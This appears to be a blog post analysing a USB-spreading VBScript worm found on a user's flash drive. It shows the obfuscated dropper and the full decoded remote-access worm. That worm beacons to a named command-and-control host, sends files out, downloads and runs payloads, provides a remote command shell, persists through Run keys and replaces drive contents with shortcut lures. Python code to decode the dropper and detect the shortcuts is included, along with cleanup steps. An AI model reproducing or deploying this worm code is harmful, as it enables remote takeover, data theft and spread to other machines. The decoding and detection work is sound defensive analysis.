Virus name: flgjahzqvm.vbs

I recently copied some files on a public computer; when I got home and opened my USB drive, everything on it had turned into shortcuts, and a .vbs file sat conspicuously in the root directory.

Opening a shortcut's Properties also showed that, before opening anything else, its target pointed at the flgjahzqvm.vbs file.

The virus's source file is written like this:

b1="3"
b2="9"
b3="|"
b4="6"
b5="0"
b6="|"
b7="9"
b8="1"
b9="|"
b10="3"
b11="2"
b12="|"
b13="1"
b14="1"
b15="4"
b16="|"
b17="1"
b18="0"
b19="1"
b20="|"
b21="9"
b22="9"
b23="|"
b24="1"
b25="1"
b26="1"
b27="|"
b28="1"
b29="0"
b30="0"
b31="|"
b32="1"
b33="0"
b34="1"
b35="|"
b36="1"
b37="1"
b38="4"
b39="|"
b40="3"
b41="2"
b42="|"
b43="5"
b44="8"
b45="|"
b46="3"
b47="2"
b48="|"
b49="1"
b50="0"
b1= b1 & b2 & b3 & b4 & b5 & b6 & b7 & b8 & b9 & b10 & b11 & b12 & b13 & b14 & b15 & b16 & b17 & b18 & b19 & b20 & b21 & b22 & b23 & b24 & b25 & b26 & b27 & b28 & b29 & b30 & b31 & b32 & b33 & b34 & b35 & b36 & b37 & b38 & b39 & b40 & b41 & b42 & b43 & b44 & b45 & b46 & b47 & b48 & b49 & b50
b51="4"
b52="|"
b53="1"
b54="1"
b55="1"
b56="|"
b57="1"
b58="1"
b59="7"
b60="|"
b61="1"
b62="0"
b63="0"
b64="|"
b65="1"
b66="0"
b67="5"
b68="|"
b69="1"
b70="1"
b71="0"
b72="|"
b73="1"
b74="0"
b75="5"
b76="|"
b77="3"
b78="2"
b79="|"
b80="4"
b81="0"
b82="|"
b83="9"
b84="9"
b85="|"
b86="4"
b87="1"
b88="|"
b89="3"
b90="2"
b91="|"
b92="1"
b93="1"
b94="5"
b95="|"
b96="1"
b97="0"
b98="7"
b99="|"
b100="1"
b1= b1 & b51 & b52 & b53 & b54 & b55 & b56 & b57 & b58 & b59 & b60 & b61 & b62 & b63 & b64 & b65 & b66 & b67 & b68 & b69 & b70 & b71 & b72 & b73 & b74 & b75 & b76 & b77 & b78 & b79 & b80 & b81 & b82 & b83 & b84 & b85 & b86 & b87 & b88 & b89 & b90 & b91 & b92 & b93 & b94 & b95 & b96 & b97 & b98 & b99 & b100
b101="2"
b102="1"
b103="|"
b104="1"
b105="1"
b106="2"
b107="|"
b108="1"
b109="0"
b110="1"
b111="|"
b112="3"
b113="2"
b114="|"
b115="5"
b116="8"
b117="|"
b118="3"
b119="2"
b120="|"
b121="1"

……

b1 = SPLIT(b1,"|")
FOR I = 0 TO UBOUND(b1) -1
NJ = NJ & CHR(b1(I))
NEXT
ExecuteGlobal (NJ)

Does that pile of variables leave you baffled at first glance?

What it actually does is split the real script into individual characters: each character code is stored digit by digit in its own variable with "|" variables as separators, the pieces are concatenated, and the Split/Chr loop rebuilds the text before ExecuteGlobal runs it. The script never appears in plain text in the file, which is how it dodges antivirus signature scanning.
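As an added example (not part of the original post and not the worm's own code), here is a Python decoder that replays the Split/Chr step statically, without executing anything, so the second stage can be recovered from a dropper in this shape. The sample dropper text is constructed for this example and decodes to the harmless statement `x=42`; the regexes and function names are my own assumptions about this particular layout.

```python
import re

# Constructed sample in the same shape as the dropper shown above: every
# character code of the hidden script is spread over single-digit variables,
# "|" variables separate the codes, the pieces are concatenated in stages, and
# the Split/Chr loop plus ExecuteGlobal rebuild and run the hidden script.
# This sample decodes to the harmless statement `x=42`.
SAMPLE_DROPPER = '''b1="1"
b2="2"
b3="0"
b4="|"
b5="6"
b6="1"
b7="|"
b8="5"
b9="2"
b10="|"
b1= b1 & b2 & b3 & b4 & b5 & b6 & b7 & b8 & b9 & b10
b11="5"
b12="0"
b13="|"
b1= b1 & b11 & b12 & b13

b1 = SPLIT(b1,"|")
FOR I = 0 TO UBOUND(b1) -1
NJ = NJ & CHR(b1(I))
NEXT
ExecuteGlobal (NJ)
'''

# `bN = <expr>` where <expr> is "literal" and/or bN names joined with `&`
ASSIGN_RE = re.compile(r'^\s*(b\d+)\s*=\s*(.+?)\s*$', re.IGNORECASE)
TERM_RE = re.compile(r'"([^"]*)"|\b(b\d+)\b', re.IGNORECASE)
# Lines that hand a built string to the interpreter: the triage signal
SINK_RE = re.compile(r'\b(executeglobal|execute|eval)\b', re.IGNORECASE)


def evaluate_string_vars(script: str) -> dict:
    """Statically fold the `bN = "x"` and `bN = bX & bY & ...` lines.

    Only string literals and already-assigned bN variables are understood;
    nothing in the script is executed, which is the whole point when the
    input is malware.
    """
    env = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if not m or "split(" in m.group(2).lower():
            continue  # skip the SPLIT/loop/ExecuteGlobal lines; only fold data
        name, expr = m.group(1).lower(), m.group(2)
        pieces = [lit if var == "" else env.get(var.lower(), "")
                  for lit, var in TERM_RE.findall(expr)]
        env[name] = "".join(pieces)  # b1 on the right still means the old b1
    return env


def decode_payload(script: str, var: str = "b1") -> str:
    """Replay the dropper's decode loop: split on "|", Chr() each code."""
    codes = evaluate_string_vars(script)[var].split("|")
    # The loop runs FOR I = 0 TO UBOUND - 1, so the last element (empty, after
    # the trailing "|") is dropped exactly as in the dropper.
    return "".join(chr(int(c)) for c in codes[:-1] if c.strip().isdigit())


def find_execution_sinks(script: str) -> list:
    """Return the lines that feed a runtime-built string to the interpreter."""
    return [ln.strip() for ln in script.splitlines() if SINK_RE.search(ln)]


if __name__ == "__main__":
    print(find_execution_sinks(SAMPLE_DROPPER))
    print(decode_payload(SAMPLE_DROPPER))
```

Running `decode_payload` on the dropper text from this post yields the Houdini script reproduced below; the `find_execution_sinks` check is the quick signal worth keeping in a triage pipeline, since a script whose only real statement is `ExecuteGlobal` of a string it assembled at runtime is rarely benign.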

After decoding, it looks like this:

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "medoutil.zapto.org"
port = 88
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next

instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select

wscript.sleep sleep

wend

sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
if filesystemobj.fileexists (drive.path & "\" & installname) then
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function

sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub

function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function

function security
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function

function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"

end if
end If

upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function

sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if

if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

sub download (fileurl,filedir)

if filedir = "" then
filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""

set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub

function upload (fileurl)

dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function

function enumdriver ()

for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter

next
end function

function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if

cmdshell = readallfromany
end function
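The install sub above sets every file and folder on a removable drive to hidden+system (attributes 2+4) and drops a same-named .lnk whose target is cmd.exe, whose window style is 7 (minimized, no focus), and whose arguments first start the worm script and only then the original file or folder. As an added example, not from the original post or the worm, here is a Python triage script that parses those shortcut files directly (MS-SHLLINK header and StringData; the IDList and LinkInfo sections are skipped rather than decoded) and flags that argument pattern. `build_lnk_fixture` produces a minimal, constructed shortcut so the parser can be exercised offline; shortcuts written by Windows carry more sections but the same flags and string order. The function names, the regex and the sample file names are my assumptions.

```python
import os
import re
import struct

# MS-SHLLINK header layout (documented format, not taken from the worm)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_IDLIST, HAS_LINK_INFO = 1 << 0, 1 << 1
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 1 << 2, 1 << 3, 1 << 4
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 5, 1 << 6, 1 << 7
SW_SHOWMINNOACTIVE = 7  # what the worm's lnkobj.windowstyle = 7 becomes

# Argument shape the install sub writes: "/c start <worm>.vbs&start <file>&exit"
# (the folder variant is "&start explorer <folder>&exit", also matched)
WORM_ARGS_RE = re.compile(r'^/c\s+start\s+.*\.vbs\s*&\s*start\s+.+&\s*exit\s*$',
                          re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Read LinkFlags, ShowCommand and the StringData strings of a .lnk file."""
    if (len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00"
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:   # skip IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize counts itself, so skip it whole
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {"flags": flags, "show_command": show_command}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"),
                      (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # character count, not bytes
        pos += 2
        if flags & IS_UNICODE:
            out[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            out[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return out


def assess_lnk(data: bytes) -> dict:
    """Heuristic verdict for one shortcut; the reasons are for the analyst."""
    lnk = parse_lnk(data)
    args = lnk.get("arguments", "")
    reasons = []
    if WORM_ARGS_RE.match(args):
        reasons.append("cmd.exe argument chain starts a .vbs, then the decoy, then exits")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE and args:
        reasons.append("window style 7 keeps the console out of sight while the chain runs")
    if lnk.get("relative_path", "").lower().endswith("cmd.exe") and "start" in args.lower():
        reasons.append("shortcut target is cmd.exe rather than the document it is named after")
    return {"suspicious": bool(reasons), "reasons": reasons, "arguments": args}


def scan_drive_root(root: str) -> list:
    """Triage every .lnk in a (removable) drive root; returns the suspicious ones."""
    hits = []
    for entry in os.scandir(root):
        if entry.is_file() and entry.name.lower().endswith(".lnk"):
            with open(entry.path, "rb") as fh:
                verdict = assess_lnk(fh.read())
            if verdict["suspicious"]:
                hits.append((entry.name, verdict["reasons"]))
    return hits


def build_lnk_fixture(arguments: str, show_command: int = SW_SHOWMINNOACTIVE,
                      relative_path: str = "cmd.exe") -> bytes:
    """Minimal constructed .lnk (no IDList/LinkInfo) so the parser runs offline."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


if __name__ == "__main__":
    sample = build_lnk_fixture("/c start flgjahzqvm.vbs&start report.docx&exit")
    print(assess_lnk(sample))
```

Run `scan_drive_root` against the mounted drive letter from a clean machine with autorun disabled; it only reads the shortcut bytes and never follows the target. Recovery follows from the worm's own uninstall sub: the original files are still present, just marked hidden+system, so deleting the flagged shortcuts and the .vbs and then clearing the attributes (`attrib -s -h` on the drive contents) restores the drive, while the Run keys and the Startup copy written by `upstart` need removing on every machine the drive was plugged into.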

Time: 2024-11-06 16:44:28
